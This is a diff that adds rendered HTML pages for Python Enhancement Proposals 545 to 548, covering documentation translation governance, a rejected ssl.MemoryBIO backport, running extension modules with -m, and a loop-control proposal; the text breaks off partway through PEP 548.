+isinstance(obj, collections.abc.Iterable) and similar checks with other
+ABCs (also in a structural manner, i.e., via __subclasshook__).
+Disabling this behavior would cause breakage. If we keep this behavior
+for ABCs in collections.abc but do not provide a similar runtime
+behavior for protocols in typing, then a smooth transition to protocols
+will not be possible. In addition, having two parallel hierarchies may cause
+confusion.

+
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Implementation

+

The mypy type checker fully supports protocols (modulo a few
+known bugs). This includes treating all the built-in protocols, such as
+Iterable, structurally. The runtime implementation of protocols is
+available in the typing_extensions module on PyPI.
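For example, a minimal sketch using that runtime implementation (the same
+names are available from typing itself in Python 3.8+):
+
from typing_extensions import Protocol
+
+class SupportsClose(Protocol):
+    def close(self) -> None: ...
+
+class File:
+    def close(self) -> None:
+        pass
+
+f: SupportsClose = File()  # accepted structurally by mypy; no subclassing needed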

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0544.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0545/index.html b/pep-0545/index.html new file mode 100644 index 00000000000..149869704ea --- /dev/null +++ b/pep-0545/index.html @@ -0,0 +1,778 @@ + + + + + + + + PEP 545 – Python Documentation Translations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 545 – Python Documentation Translations

+
+
Author:
+
Julien Palard <julien at palard.fr>, +Inada Naoki <songofacandy at gmail.com>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
04-Mar-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The intent of this PEP is to make existing translations of the Python +Documentation more accessible and discoverable. By doing so, we hope +to attract and motivate new translators and new translations.

+

Translated documentation will be hosted on python.org. Examples of +two active translation teams:

+ +

http://docs.python.org/en/ will redirect to http://docs.python.org/.

+

Sources of translated documentation will be hosted in the Python +organization on GitHub: https://github.com/python/. Contributors will +have to accept a Documentation Contribution Agreement.

+
+
+

Motivation

+

On the French #python-fr IRC channel on freenode, it’s not rare to
+meet people who don’t speak English and so are unable to read the
+official Python documentation. Python wants to be widely available
+to all users in any language: this is also why Python 3 supports
+non-ASCII identifiers (PEP 3131).

+

There are at least 4 groups of people who are translating the Python
+documentation to their native language (French [16] [17] [18],
+Japanese [19] [20], Spanish [21], Hungarian [26] [27]) even
+though their translations are not visible on docs.python.org (d.p.o).
+Other, less visible and less organized groups are also translating the
+documentation; we’ve heard of Russian [25], Chinese and
+Korean. Others we haven’t found yet might also exist. This PEP
+defines rules describing how to move translations onto docs.python.org
+so they can easily be found by developers, newcomers and potential
+translators.

+

The Japanese team has (as of March 2017) translated ~80% of the +documentation, the French team ~20%. French translation went from 6% +to 23% in 2016 [13] with 7 contributors [14], proving a translation +team can be faster than the rate the documentation mutates.

+

Quoting Xiang Zhang about Chinese translations:

+
+
I have seen several groups trying to translate part of our official +doc. But their efforts are disperse and quickly become lost because +they are not organized to work towards a single common result and +their results are hold anywhere on the Web and hard to find. An +official one could help ease the pain.
+
+
+

Rationale

+
+

Translation

+
+

Issue tracker

+

Considering that issues opened about translations may be written in
+the translation language, which can be considered noise, or at the very
+least inconsistent, issues should be placed outside bugs.python.org (b.p.o).

+

As all translation must have their own GitHub project (see Repository +for Po Files), they must use the associated GitHub issue tracker.

+

Considering the noise induced by translation issues written in any
+language, which may land in b.p.o despite every warning, triage will
+have to be done. Considering that translations already exist and are
+not actually a source of noise in b.p.o, an unmanageable amount of
+work is not to be expected. Considering that Xiang Zhang and Victor
+Stinner are already triaging, and Julien Palard is willing to help with
+this task, noise on b.p.o is not to be expected.

+

Also, language team coordinators (see Language Team) should help +with triaging b.p.o by properly indicating, in the language of the +issue author if required, the right issue tracker.

+
+
+

Branches

+

Translation teams should focus on last stable versions, and use tools +(scripts, translation memory, …) to automatically translate what is +done in one branch to other branches.

+
+

Note

+

Translation memories are a kind of database of previously translated +paragraphs, even removed ones. See also Sphinx Internationalization.

+
+

The three currently stable branches that will be translated are [12]:
+2.7, 3.5, and 3.6. The scripts to build the documentation of older
+branches need to be modified to support translation [12], whereas
+these branches now only accept security-only fixes.

+

The development branch (main) should have a lower translation priority +than stable branches. But docsbuild-scripts should build it anyway so +it is possible for a team to work on it to be ready for the next +release.

+
+
+
+

Hosting

+
+

Domain Name, Content negotiation and URL

+

Different translations can be identified by changing one of the +following: Country Code Top Level Domain (CCTLD), +path segment, subdomain or content negotiation.

+

Buying a CCTLD for each translation is expensive, time-consuming, and
+sometimes almost impossible when the domain is already registered, so this
+solution should be avoided.

+

Using subdomains like “es.docs.python.org” or “docs.es.python.org” is
+possible but confusing (“is it es.docs.python.org or
+docs.es.python.org?”). Hyphens in subdomains like
+pt-br.doc.python.org are uncommon, and SEOMoz [23] correlated the
+presence of hyphens with a negative ranking factor. Usage of underscores in
+subdomains is prohibited by RFC 1123, section 2.1. Finally,
+using subdomains means creating TLS certificates for each
+language. This not only requires more maintenance but will also cause
+issues in the language switcher if, as for the version switcher, we want a
+preflight to check whether the translation exists in the given version: the
+preflight will probably be blocked by the same-origin policy. Wildcard
+TLS certificates are very expensive.

+

Using content negotiation (HTTP headers Accept-Language in the
+request and Vary: Accept-Language) leads to a bad user experience
+where users can’t easily change the language. According to Mozilla:
+“This header is a hint to be used when the server has no way of
+determining the language via another way, like a specific URL, that is
+controlled by an explicit user decision.” [24]. As we want users to be
+able to easily change the language, we should not use content
+negotiation as the main means of language determination; we need
+something else.

+

The last solution is to use the URL path, which looks readable, allows
+for an easy switch from one language to another, and nicely accepts
+hyphens. Typically something like: “docs.python.org/de/” or, by
+using a hyphen: “docs.python.org/pt-BR/”.

+

As for the version, sphinx-doc does not support compiling for multiple +languages, so we’ll have full builds rooted under a path, exactly like +we’re already doing with versions.

+

So we can have “docs.python.org/de/3.6/” or +“docs.python.org/3.6/de/”. A question that arises is: +“Does the language contain multiple versions or does the version contain +multiple languages?”. As versions exist in any case and translations +for a given version may or may not exist, we may prefer +“docs.python.org/3.6/de/”, but doing so scatters languages everywhere. +Having “/de/3.6/” is clearer, meaning: “everything under /de/ is written +in German”. Having the version at the end is also a habit taken by +readers of the documentation: they like to easily change the version +by changing the end of the path.

+

So we should use the following pattern: +“docs.python.org/LANGUAGE_TAG/VERSION/”.

+

The current documentation is not moved to “/en/”, instead +“docs.python.org/en/” will redirect to “docs.python.org”.

+
+
+

Language Tag

+

A common notation for language tags is the IETF Language Tag +[4] based on ISO 639, although gettext uses ISO 639 tags with +underscores (ex: pt_BR) instead of dashes to join tags [5] +(ex: pt-BR). Examples of IETF Language Tags: fr (French), +ja (Japanese), pt-BR (Orthographic formulation of 1943 - +Official in Brazil).

+

It is more common to see dashes instead of underscores in URLs [6], +so we should use IETF language tags, even if sphinx uses gettext +internally: URLs are not meant to leak the underlying implementation.

+

It’s uncommon to see capitalized letters in URLs, and docs.python.org
+doesn’t use any, so capitals may hurt readability by attracting the eye,
+as in: “https://docs.python.org/pt-BR/3.6/library/stdtypes.html”.
+RFC 5646 (Tags for Identifying Languages), section 2.1.1,
+states that tags are not case sensitive. As the RFC allows lower case,
+and it enhances readability, we should use lowercased tags like
+pt-br.

+

We may drop the region subtag when it does not add distinguishing
+information, for example: “de-DE” or “fr-FR”. (Although it might
+make sense, respectively meaning “German as spoken in Germany”
+and “French as spoken in France”.) But when the region subtag
+actually adds information, for example “pt-BR” (“Portuguese as
+spoken in Brazil”), it should be kept.

+

So we should use IETF language tags, lowercased, like /fr/, +/pt-br/, /de/ and so on.

+
+
+

Fetching And Building Translations

+

Currently docsbuild-scripts are building the documentation [8]. +These scripts should be modified to fetch and build translations.

+

Building new translations is like building new versions, so while we’re
+adding complexity, it is not that much.

+

Two steps should be configurable separately: building a new language,
+and adding it to the language switcher. This allows a transition step
+between “we accepted the language” and “it is translated enough to be
+made public”. During this step, translators can review their
+modifications on d.p.o without having to build the documentation
+locally.

+

From the translation repositories, only the .po files should be
+opened by the docsbuild-scripts, to keep the attack surface and probable
+bug sources at a minimum. This means no translation team can patch sphinx
+to advertise its translation tool. (This specific feature should be
+handled by sphinx anyway [9]).

+
+
+
+

Community

+
+

Mailing List

+

The doc-sig mailing list will be used to discuss cross-language +changes on translated documentation.

+

There is also the i18n-sig list but it’s more oriented towards i18n APIs +[1] than translating the Python documentation.

+
+
+

Chat

+

Due to the Python community being highly active on IRC, we should +create a new IRC channel on freenode, typically #python-doc for +consistency with the mailing list name.

+

Each language coordinator can organize their own team, even by choosing +another chat system if the local usage asks for it. As local teams +will write in their native languages, we don’t want each team in a +single channel. It’s also natural for the local teams to reuse +their local channels like “#python-fr” for French translators.

+
+
+

Repository for PO Files

+

Considering that each translation team may want to use different +translation tools, and that those tools should easily be synchronized +with git, all translations should expose their .po files via a git +repository.

+

Considering that each translation will be exposed via git +repositories, and that Python has migrated to GitHub, translations +will be hosted on GitHub.

+

For consistency and discoverability, all translations should be in the +same GitHub organization and named according to a common pattern.

+

Given that we want translations to be official, and that Python +already has a GitHub organization, translations should be hosted as +projects of the Python GitHub organization.

+

For consistency, translation repositories should be called +python-docs-LANGUAGE_TAG [22], using the language tag used in +paths: without region subtag if redundant, and lowercased.

+

The docsbuild-scripts may enforce this rule by refusing to fetch +outside of the Python organization or a wrongly named repository.

+

The CLA bot may be used on the translation repositories, but with a +limited effect as local coordinators may synchronize themselves with +translations from an external tool, like transifex, and lose track +of who translated what in the process.

+

Versions can be hosted on different repositories, different directories +or different branches. Storing them on different repositories will +probably pollute the Python GitHub organization. As it +is typical and natural to use branches to separate versions, branches +should be used to do so.

+
+
+

Translation tools

+

Most of the translation work is actually done on Transifex [15].

+

Other tools may be used later like https://pontoon.mozilla.org/ +and http://zanata.org/.

+
+
+

Documentation Contribution Agreement

+

Documentation does require a license from the translator, as it +involves creativity in the expression of the ideas.

+

There are multiple solutions; quoting Van Lindberg from the PSF, when asked
+about the subject:

+
+
    +
  1. Docs should either have the copyright assigned or be under CC0. A
+permissive software license (like Apache or MIT) would also get the
+job done, although it is not quite fit for the task.
  2. +
  3. The translators should either sign an agreement or submit a +declaration of the license with the translation.
  4. +
  5. We should have in the project page an invitation for people to +contribute under a defined license, with acceptance defined by their +act of contribution. Such as:
  6. +
+

“By posting this project on Transifex and inviting you to
+participate, we are proposing an agreement that you will provide
+your translation for the PSF’s use under the CC0 license. In return,
+you may note that you were the translator for the portion you
+translate. You signify acceptance of this agreement by submitting
+your work to the PSF for inclusion in the documentation.”

+
+

It looks like having a “Documentation Contribution Agreement”
+is the simplest thing we can do, as we can use multiple means (GitHub
+bots, an invitation page, …) in different contexts to ensure contributors
+agree with it.

+
+
+

Language Team

+

Each language team should have one coordinator responsible for:

+
    +
  • Managing the team.
  • +
  • Choosing and managing the tools the team will use (chat, mailing list, …).
  • +
  • Ensuring contributors understand and agree with the documentation
+contribution agreement.
  • +
  • Ensuring quality (grammar, vocabulary, consistency, filtering spam, ads, …).
  • +
  • Redirecting issues posted on b.p.o to the correct GitHub issue tracker
+for the language.
  • +
+
+
+
+

Alternatives

+
+

Simplified English

+

It would be possible to introduce a “simplified English” version like +Wikipedia did [10], as discussed on python-dev [11], targeting +English learners and children.

+

Pros: It yields a single translation, theoretically readable by +everyone and reviewable by current maintainers.

+

Cons: Subtle details may be lost, and translators from English to English +may be hard to find as stated by Wikipedia:

+

> The main English Wikipedia has 5 million articles, written by nearly +140K active users; the Swedish Wikipedia is almost as big, 3M articles +from only 3K active users; but the Simple English Wikipedia has just +123K articles and 871 active users. That’s fewer articles than +Esperanto!

+
+
+
+
+

Changes

+
+

Get a Documentation Contribution Agreement

+

The Documentation Contribution Agreement has to be written by the
+PSF, then listed at https://www.python.org/psf/contrib/ and given its
+own page like https://www.python.org/psf/contrib/doc-contrib-form/.

+
+
+

Migrate GitHub Repositories

+

We (authors of this PEP) already own French and Japanese Git repositories, +so moving them to the Python documentation organization will not be a +problem. We’ll however be following the New Translation Procedure.

+
+
+

Setup a GitHub bot for Documentation Contribution Agreement

+

To help ensure that contributors on GitHub have signed the
+Documentation Contribution Agreement, we can set up the “Knights
+Who Say Ni” GitHub bot, customized for this agreement, on the migrated
+repositories [28].

+
+
+

Patch docsbuild-scripts to Compile Translations

+

The docsbuild-scripts must be patched to:

+
    +
  • List the language tags to build along with the branches to build.
  • +
  • List the language tags to display in the language switcher.
  • +
  • Find translation repositories by formatting
+github.com:python/python-docs-{language_tag}.git (see
+Repository for Po Files; a sketch of this formatting appears below).
  • +
  • Build translations for each branch and each language.
  • +
+

Patched docsbuild-scripts must only open .po files from +translation repositories.
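As an illustration, here is a sketch of how a repository address could be
+derived from a language tag as described above (a hypothetical helper, not
+actual docsbuild-scripts code):
+
def translation_repo(language_tag: str) -> str:
+    primary, _, region = language_tag.partition("-")
+    if region and primary.lower() == region.lower():
+        tag = primary.lower()  # drop a redundant region subtag: "de-DE" -> "de"
+    else:
+        tag = language_tag.lower()  # otherwise just lowercase: "pt-BR" -> "pt-br"
+    return "github.com:python/python-docs-{}.git".format(tag)
+
+assert translation_repo("pt-BR") == "github.com:python/python-docs-pt-br.git"
+assert translation_repo("de-DE") == "github.com:python/python-docs-de.git"
+assert translation_repo("fr") == "github.com:python/python-docs-fr.git"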

+
+
+

List coordinators in the devguide

+

Add a page or a section with an empty list of coordinators to the +devguide, each new coordinator will be added to this list.

+
+
+

Create sphinx-doc Language Switcher

+

Highly similar to the version switcher, a language switcher must be +implemented. This language switcher must be configurable to hide or +show a given language.

+

The language switcher will only have to update or add the language
+segment in the path, like the current version switcher does. Unlike
+the version switcher, no preflight is required, as the destination page
+always exists (translations do not add or remove pages).
+Untranslated (but existing) pages still exist; they should however be
+rendered as such, see Enhance Rendering of Untranslated and Fuzzy
+Translations.

+
+
+

Update sphinx-doc Version Switcher

+

The patch_url function of the version switcher in
+version_switch.js has to be updated to understand and allow the
+presence of the language segment in the path.

+
+
+

Enhance Rendering of Untranslated and Fuzzy Translations

+

It’s an open sphinx issue [9], but we’ll need this feature, so we’ll have to
+work on it. Translated, fuzzy, and untranslated paragraphs should be
+differentiated. (Fuzzy paragraphs have to warn the reader that what they’re
+reading may be out of date.)

+
+
+
+

New Translation Procedure

+
+

Designate a Coordinator

+

The first step is to designate a coordinator, see Language Team.
+The coordinator must sign the CLA.

+

The coordinator should be added to the list of translation coordinators +on the devguide.

+
+
+

Create GitHub Repository

+

Create a repository named “python-docs-{LANGUAGE_TAG}” (IETF language +tag, without redundant region subtag, with a dash, and lowercased.) on +the Python GitHub organization (See Repository For Po Files.), and +grant the language coordinator push rights to this repository.

+
+
+

Setup the Documentation Contribution Agreement

+

The README file should clearly show the following Documentation +Contribution Agreement:

+
NOTE REGARDING THE LICENSE FOR TRANSLATIONS: Python's documentation is
+maintained using a global network of volunteers. By posting this
+project on Transifex, GitHub, and other public places, and inviting
+you to participate, we are proposing an agreement that you will
+provide your improvements to Python's documentation or the translation
+of Python's documentation for the PSF's use under the CC0 license
+(available at
+`https://creativecommons.org/publicdomain/zero/1.0/legalcode`_). In
+return, you may publicly claim credit for the portion of the
+translation you contributed and if your translation is accepted by the
+PSF, you may (but are not required to) submit a patch including an
+appropriate annotation in the Misc/ACKS or TRANSLATORS file. Although
+nothing in this Documentation Contribution Agreement obligates the PSF
+to incorporate your textual contribution, your participation in the
+Python community is welcomed and appreciated.
+
+You signify acceptance of this agreement by submitting your work to
+the PSF for inclusion in the documentation.
+
+
+
+
+

Add support for translations in docsbuild-scripts

+

As soon as the translation hits its first commits, update the +docsbuild-scripts configuration to build the translation (but not +displaying it in the language switcher).

+
+
+

Add Translation to the Language Switcher

+

As soon as the translation hits:

+
    +
  • 100% of bugs.html with proper links to the language repository +issue tracker.
  • +
  • 100% of tutorial.
  • +
  • 100% of library/functions (builtins).
  • +
+

the translation can be added to the language switcher.

+
+
+
+

Previous Discussions

+

[Python-ideas] Cross link documentation translations (January, 2016)

+

[Python-Dev] Translated Python documentation (February 2016)

+

[Python-ideas] https://docs.python.org/fr/ ? (March 2016)

+
+
+

References

+ +

[2] [Doc-SIG] Localization of Python docs + (https://mail.python.org/pipermail/doc-sig/2013-September/003948.html)

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0545.rst

+

Last modified: 2024-10-29 09:04:22 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0546/index.html b/pep-0546/index.html new file mode 100644 index 00000000000..ecc037ccac5 --- /dev/null +++ b/pep-0546/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 546 – Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 546 – Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7

+
+
Author:
+
Victor Stinner <vstinner at python.org>, +Cory Benfield <cory at lukasa.co.uk>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-May-2017
+
Python-Version:
+
2.7
+
Post-History:
+
23-May-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Backport the ssl.MemoryBIO and ssl.SSLObject classes from Python 3 to Python +2.7 to enhance the overall security of Python 2.7.

+
+
+

Rejection Notice

+

This PEP is rejected, see Withdraw PEP 546? Backport ssl.MemoryBIO and +ssl.SSLObject to Python 2.7 +discussion for the rationale.

+
+
+

Rationale

+

While Python 2.7 is getting closer to its end-of-support date (scheduled for +2020), it is still used on production systems and the Python community is still +responsible for its security. This PEP will help facilitate the future adoption +of PEP 543 across all supported Python versions, which will improve security +for both Python 2 and Python 3 users.

+

This PEP does NOT propose a general exception for backporting new +features to Python 2.7 - every new feature proposed for backporting will +still need to be justified independently. In particular, it will need to +be explained why relying on an independently updated backport on the +Python Package Index instead is not an acceptable solution.

+
+

PEP 543

+

PEP 543 defines a new TLS API for Python which would enhance Python +security by giving Python applications access to the native TLS implementations +on Windows and macOS, instead of using OpenSSL. A side effect is that it gives +access to the system trust store and certificates installed +locally by system administrators, enabling Python applications to use “company +certificates” without having to modify each application and so to correctly +validate TLS certificates (instead of having to ignore or bypass TLS +certificate validation).

+

For practical reasons, Cory Benfield would like to first implement an +I/O-less class similar to ssl.MemoryBIO and ssl.SSLObject for +PEP 543, and to provide a second class based on the first one to use +sockets or file descriptors. This design would help to structure the code +to support more backends and simplify testing and auditing, as well as +implementation. Later, optimized classes using directly sockets or file +descriptors may be added for performance.

+

While PEP 543 defines an API, the PEP would only make sense if it +comes with at least one complete and good implementation. The first +implementation would ideally be based on the ssl module of the Python +standard library, as this is shipped to all users by default and can be used as +a fallback implementation in the absence of anything more targeted.

+

If this backport is not performed, the only baseline implementation that could +be used would be pyOpenSSL. This is problematic, however, because of the +interaction with pip, which is shipped with CPython on all supported versions.

+
+
+

requests, pip and ensurepip

+

There are plans afoot to look at moving Requests to a more event-loop-y +model. The Requests team does not feel at this time it is possible to abandon +support for Python 2.7, so doing so would require using either Twisted or +Tornado, or writing their own asynchronous abstraction.

+

For asynchronous code, a MemoryBIO provides substantial advantages over using a +wrapped socket. It reduces the amount of buffering that must be done, works on +IOCP-based reactors as well as select/poll based ones, and also greatly +simplifies the reactor and implementation code. For this reason, Requests is +disinclined to use a wrapped-socket-based implementation. In the absence of a +backport to Python 2.7, Requests is required to use the same solution that +Twisted does: namely, a mandatory dependency on pyOpenSSL.
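For illustration, a minimal sketch of the I/O-less pattern that
+ssl.MemoryBIO enables, using the Python 3 API this PEP proposes backporting:
+
import ssl
+
+ctx = ssl.create_default_context()
+incoming = ssl.MemoryBIO()   # bytes received from the network are written here
+outgoing = ssl.MemoryBIO()   # bytes to send to the network are read from here
+tls = ctx.wrap_bio(incoming, outgoing, server_hostname="example.com")
+
+try:
+    tls.do_handshake()           # performs TLS using only the two BIOs
+except ssl.SSLWantReadError:
+    hello = outgoing.read()      # ClientHello bytes for the transport to send
+    # The event loop sends these bytes, feeds the peer's reply into
+    # incoming.write(...), and calls do_handshake() again.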

+

The pip program has to embed all its
+dependencies for practical reasons: namely, that it cannot rely on any other
+installation method being present. Since pip depends on requests, this means
+that it would have to embed a copy of pyOpenSSL. That would imply substantial
+usability pain to install pip. Currently, pip doesn’t support embedding
+C extensions, which must be compiled on each platform and so require a C
+compiler.

+

Since Python 2.7.9, Python embeds a copy of pip both for default +installation and for use in virtual environments via the new ensurepip +module. If pip ends up bundling PyOpenSSL, then CPython will end up +bundling PyOpenSSL. Only backporting ssl.MemoryBIO and +ssl.SSLObject would avoid the need to embed pyOpenSSL, and would fix the +bootstrap issue (python -> ensurepip -> pip -> requests -> MemoryBIO).

+

This situation is less problematic than the barrier to adoption of PEP 543, as +naturally Requests does not have to move to an event loop model before it drops +support for Python 2.7. However, it does make it painful for Requests (and pip) +to embrace both asyncio and the async and await keywords for as long as +it continues to support Python 2.

+
+
+

Other Benefits

+

Adopting this PEP would have other smaller ecosystem benefits. For example, +Twisted would be able to reduce its dependency on third-party C extensions. +Additionally, the PyOpenSSL development team would like to sunset the module, +and this backport would free them up to do so in a graceful manner without +leaving their users in the lurch.

+

Each of these fringe benefits, while small, also provides value to the wider +Python ecosystem.

+
+
+
+

Concerns

+

There are some concerns that people have about this backport.

+
+

What About Old Python 2?

+

A number of the Python 2 users in the world are not keeping pace with Python 2
+releases. This is most usually because they are using LTS releases that are not
+keeping pace with the minor releases of Python 2. These users would not be able
+to use the MemoryBIO, and so projects concerned with Python 2 compatibility may
+be unable to rely on the MemoryBIO being present on most of their users’
+systems.

+

This concern is reasonable. How critical it is depends on the likelihood of +current users of Python 2 migrating to Python 3, or just trying to use the most +recent Python 2 release. Put another way, at some point libraries will want to +drop Python 2 support: the question is only whether a significant majority of +their Python 2 users have moved to whatever Python 2 release contains this +backport before they do so.

+

Ultimately, the authors of this PEP believe that the burden of this backport is +sufficiently minimal to justify backporting despite this concern. If it turns +out that migration to newer 2.7 releases is too slow, then the value of the +work will be minimal, but if the migration to newer 2.7 releases is anything +like reasonable then there will be substantial value gained.

+
+
+
+

Changes

+

Add MemoryBIO and SSLObject classes to the ssl module of +Python 2.7.

+

The code will be backported and adapted from the master branch +(Python 3).

+

The backport would also significantly reduce the size of the Python 2/Python
+3 difference of the _ssl module, which would make maintenance easier.

+
+ +
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0546.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0547/index.html b/pep-0547/index.html new file mode 100644 index 00000000000..5d902c84647 --- /dev/null +++ b/pep-0547/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 547 – Running extension modules using the -m option | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 547 – Running extension modules using the -m option

+
+
Author:
+
Marcel Plch <gmarcel.plch at gmail.com>, +Petr Viktorin <encukou at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
25-May-2017
+
Python-Version:
+
3.7
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Deferral Notice

+

Cython – the most important use case for this PEP and the only explicit +one – is not ready for multi-phase initialization yet. +It keeps global state in C-level static variables. +See discussion at Cython issue 1923.

+

The PEP is deferred until the situation changes.

+
+
+

Abstract

+

This PEP proposes implementation that allows built-in and extension +modules to be executed in the __main__ namespace using +the PEP 489 multi-phase initialization.

+

With this, a multi-phase initialization enabled module can be run +using following command:

+
$ python3 -m _testmultiphase
+This is a test module named __main__.
+
+
+
+
+

Motivation

+

Currently, extension modules do not support all functionality of +Python source modules. +Specifically, it is not possible to run extension modules as scripts using +Python’s -m option.

+

The technical groundwork to make this possible has been done for PEP 489, +and enabling the -m option is listed in that PEP’s +“Possible Future Extensions” section. +Technically, the additional changes proposed here are relatively small.

+
+
+

Rationale

+

Extension modules’ lack of support for the -m option has traditionally +been worked around by providing a Python wrapper. +For example, the _pickle module’s command line interface is in the +pure-Python pickle module (along with a pure-Python reimplementation).

+

This works well for standard library modules, as building command line +interfaces using the C API is cumbersome. +However, other users may want to create executable extension modules directly.

+

An important use case is Cython, a Python-like language that compiles to +C extension modules. +Cython is a (near) superset of Python, meaning that compiling a Python module +with Cython will typically not change the module’s functionality, allowing +Cython-specific features to be added gradually. +This PEP will allow Cython extension modules to behave the same as their Python +counterparts when run using the -m option. +Cython developers consider the feature worth implementing (see +Cython issue 1715).

+
+
+

Background

+

Python’s -m option is handled by the function +runpy._run_module_as_main.

+

The module specified by -m is not imported normally. +Instead, it is executed in the namespace of the __main__ module, +which is created quite early in interpreter initialization.

+

For Python source modules, running in another module’s namespace is not +a problem: the code is executed with locals and globals set to the +existing module’s __dict__. +This is not the case for extension modules, whose PyInit_* entry point +traditionally both created a new module object (using PyModule_Create), +and initialized it.

+

Since Python 3.5, extension modules can use PEP 489 multi-phase initialization. +In this scenario, the PyInit_* entry point returns a PyModuleDef +structure: a description of how the module should be created and initialized. +The extension can choose to customize creation of the module object using +the Py_mod_create callback, or opt to use a normal module object by not +specifying Py_mod_create. +Another callback, Py_mod_exec, is then called to initialize the module +object, e.g. by populating it with methods and classes.

+
+
+

Proposal

+

Multi-phase initialization makes it possible to execute an extension module in +another module’s namespace: if a Py_mod_create callback is not specified, +the __main__ module can be passed to the Py_mod_exec callback to be +initialized, as if __main__ was a freshly constructed module object.

+

One complication in this scheme is C-level module state. +Each module has a md_state pointer that points to a region of memory +allocated when an extension module is created. +The PyModuleDef specifies how much memory is to be allocated.

+

The implementation must take care that md_state memory is allocated at most
+once. Also, the Py_mod_exec callback should only be called once per module.
+The implications of multiply-initialized modules are too subtle to expect
+extension authors to reason about them.
+The md_state pointer itself will serve as a guard: allocating the memory
+and calling Py_mod_exec will always be done together, and initializing an
+extension module will fail if md_state is already non-NULL.

+

Since the __main__ module is not created as an extension module, +its md_state is normally NULL. +Before initializing an extension module in __main__’s context, its module +state will be allocated according to the PyModuleDef of that module.

+

While PEP 489 was designed to make these changes generally possible, +it’s necessary to decouple module discovery, creation, and initialization +steps for extension modules, so that another module can be used instead of +a newly initialized one, and the functionality needs to be added to +runpy and importlib.

+
+
+

Specification

+

A new optional method for importlib loaders will be added. +This method will be called exec_in_module and will take two +positional arguments: module spec and an already existing module. +Any import-related attributes, such as __spec__ or __name__, +already set on the module will be ignored.

+

The runpy._run_module_as_main function will look for this new +loader method. +If it is present, runpy will execute it instead of trying to load and +run the module’s Python code. +Otherwise, runpy will act as before.
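A rough sketch of that dispatch (illustrative only, not the actual runpy
+code; it assumes the loader method name specified above):
+
import sys
+
+def run_module_as_main_sketch(spec):
+    main_module = sys.modules["__main__"]
+    exec_in_module = getattr(spec.loader, "exec_in_module", None)
+    if exec_in_module is not None:
+        # New path: initialize the extension module directly in __main__.
+        exec_in_module(spec, main_module)
+    else:
+        # Existing path: run the module's code in __main__'s namespace.
+        code = spec.loader.get_code(spec.name)
+        exec(code, main_module.__dict__)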

+
+

ExtensionFileLoader Changes

+

importlib’s ExtensionFileLoader will get an implementation of +exec_in_module that will call a new function, _imp.exec_in_module.

+

_imp.exec_in_module will use existing machinery to find and call an +extension module’s PyInit_* function.

+

The PyInit_* function can return either a fully initialized module +(single-phase initialization) or a PyModuleDef (for PEP 489 multi-phase +initialization).

+

In the single-phase initialization case, _imp.exec_in_module will raise +ImportError.

+

In the multi-phase initialization case, the PyModuleDef and the module to +be initialized will be passed to a new function, PyModule_ExecInModule.

+

This function raises ImportError if the PyModuleDef specifies +a Py_mod_create slot, or if the module has already been initialized +(i.e. its md_state pointer is not NULL). +Otherwise, the function will initialize the module according to the +PyModuleDef.

+
+
+
+

Backwards Compatibility

+

This PEP maintains backwards compatibility. +It only adds new functions, and a new loader method that is added for +a loader that previously did not support running modules as __main__.

+
+
+

Reference Implementation

+

The reference implementation of this PEP is available at GitHub.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0547.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0548/index.html b/pep-0548/index.html new file mode 100644 index 00000000000..a5cd9b68966 --- /dev/null +++ b/pep-0548/index.html @@ -0,0 +1,385 @@ + + + + + + + + PEP 548 – More Flexible Loop Control | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 548 – More Flexible Loop Control

+
+
Author:
+
R David Murray
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
05-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
05-Aug-2017
+
+
+
+
Table of Contents +
+
+

Rejection Note

+

Rejection by Guido: +https://mail.python.org/pipermail/python-dev/2017-September/149232.html

+
+
+

Abstract

+

This PEP proposes enhancing the break and continue statements +with an optional boolean expression that controls whether or not +they execute. This allows the flow of control in loops to be +expressed more clearly and compactly.

+
+
+

Motivation

+

Quoting from the rejected PEP 315:

+
+
It is often necessary for some code to be executed before each +evaluation of the while loop condition. This code is often +duplicated outside the loop, as setup code that executes once +before entering the loop:
<setup code>
